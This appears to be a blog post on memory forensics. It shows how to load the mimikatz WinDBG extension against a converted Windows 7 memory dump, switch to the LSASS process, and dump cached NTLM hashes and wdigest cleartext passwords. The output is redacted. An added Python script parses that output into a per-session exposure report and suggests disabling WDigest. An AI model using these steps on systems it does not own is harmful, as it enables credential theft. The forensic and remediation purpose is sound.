Now this is interesting. It is possible to load a full memory dump into WinDBG, load the mimikatz WinDBG extension (mimilib.dll) and dump the credentials in cleartext. For this I used the dump of the Windows 7 machine from part 2.
For this:
– Download and install WinDBG
– Download MoonSols Windows Memory Toolkit (http://www.moonsols.com/windows-memory-toolkit/)
Convert the raw memory image into a crash dump with bin2dmp.exe from the MoonSols toolkit:
C:\Users\dax\Downloads\MWMT-v1.4>bin2dmp.exe ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.raw ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.dmp
Note: Don’t use the Volatility built-in function raw2dmp for this task. This did not work for me.
In WinDBG:
– For an x64 dump, start the x64 version of WinDBG
– Open the converted crash dump
Then:
0: kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 7601
 ## / \ ##   /* * *
 ## \ / ##    Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'    http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
0: kd> .SymFix
0: kd> .Reload
Loading Kernel Symbols
........................................................................................
.........................................................................................
..................................................................
Loading User Symbols
...............
Loading unloaded module list
....Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
Loading Wow64 Symbols
................................................
0: kd> !process 0 0 lsass.exe
PROCESS fffffa80072b2b10
SessionId: 0 Cid: 01dc Peb: 7fffffd6000 ParentCid: 0188
DirBase: 137127000 ObjectTable: fffff8a001159230 HandleCount: 660.
Image: lsass.exe
0: kd> .process /r /p fffffa80072b2b10
Implicit process is now fffffa80`072b2b10
Loading User Symbols
.........................................................................................
0: kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key: {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 835674 (00000000:000cc05a)
Session : Interactive from 0
User Name : __vmware_user__
Domain : daxamd
Logon Server : DAXAMD
Logon Time : 24.01.2016 12:09:33
SID : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
msv :
[00010000] CredentialKeys
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[00000003] Primary
* Username : __vmware_user__
* Domain : daxamd
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
tspkg : KO
wdigest :
* Username : __vmware_user__
* Domain : daxamd
* Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
kerberos :
* Username : __vmware_user__
* Domain : daxamd
* Password : (null)
ssp :
masterkey :
credman :
Authentication Id : 0 ; 221616 (00000000:000361b0)
Session : Interactive from 1
User Name : dax
Domain : daxamd
Logon Server : DAXAMD
Logon Time : 24.01.2016 12:07:40
SID : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
msv :
[00000003] Primary
* Username : dax
* Domain : daxamd
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[00010000] CredentialKeys
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
tspkg : KO
wdigest :
* Username : dax
* Domain : daxamd
* Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
kerberos :
* Username : dax
* Domain : daxamd
* Password : (null)
— cut —
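The !mimikatz output above is the raw material for the remediation question a responder actually has to answer: which logon sessions in this dump had a cleartext password cached (on Windows 7 that is typically the wdigest provider, while kerberos shows (null)), and which only exposed an NTLM hash. The following script is an added example, not part of the original post or of mimikatz; it parses the SekurLSA section into per-session records and prints an exposure summary. The SAMPLE text is constructed in the shape of the redacted output shown above, with placeholder hash and password fields.

```python
import re

# Constructed sample in the shape of the !mimikatz SekurLSA output; placeholders, not dump values.
SAMPLE = """\
Authentication Id : 0 ; 835674 (00000000:000cc05a)
User Name : __vmware_user__
Domain : daxamd
msv :
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
tspkg : KO
wdigest :
* Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Authentication Id : 0 ; 221616 (00000000:000361b0)
User Name : dax
Domain : daxamd
wdigest :
* Password : (null)
"""
PROVIDERS = {"msv", "tspkg", "wdigest", "kerberos", "ssp", "masterkey", "credman"}

def parse_sekurlsa(text):
    """Group SekurLSA output by logon session: user, domain, whether msv held
    an NTLM hash, and which providers held a non-null cleartext password."""
    sessions, cur, prov = [], None, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("Authentication Id"):
            cur = {"user": None, "domain": None, "ntlm": False, "cleartext": set()}
            sessions.append(cur)
            prov = None
        elif cur is None:
            continue                       # header text before the first session
        elif (m := re.match(r"^(\w+) :\s*(KO)?$", line)) and m[1] in PROVIDERS:
            prov = m[1]                    # "tspkg : KO" = provider returned nothing
        elif line.startswith("User Name :"):
            cur["user"] = line.split(":", 1)[1].strip()
        elif line.startswith("Domain :"):  # top-level only; "* Domain" starts with '*'
            cur["domain"] = line.split(":", 1)[1].strip()
        elif line.startswith("* NTLM :") and prov == "msv":
            cur["ntlm"] = True
        elif line.startswith("* Password :") and prov:
            if line.split(":", 1)[1].strip() != "(null)":
                cur["cleartext"].add(prov)
    return sessions

def exposure_report(text):
    """One line per session naming the providers that held a cleartext password."""
    return [f"{s['domain']}\\{s['user']}: ntlm={'yes' if s['ntlm'] else 'no'}; "
            f"cleartext via {', '.join(sorted(s['cleartext'])) or 'none'}"
            for s in parse_sekurlsa(text)]
```

Any session listed with "cleartext via wdigest" is a host where WDigest credential caching is still enabled, which is the setting to turn off (UseLogonCredential = 0 after KB2871997) alongside resetting the affected accounts.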
Again, I found this one awesome.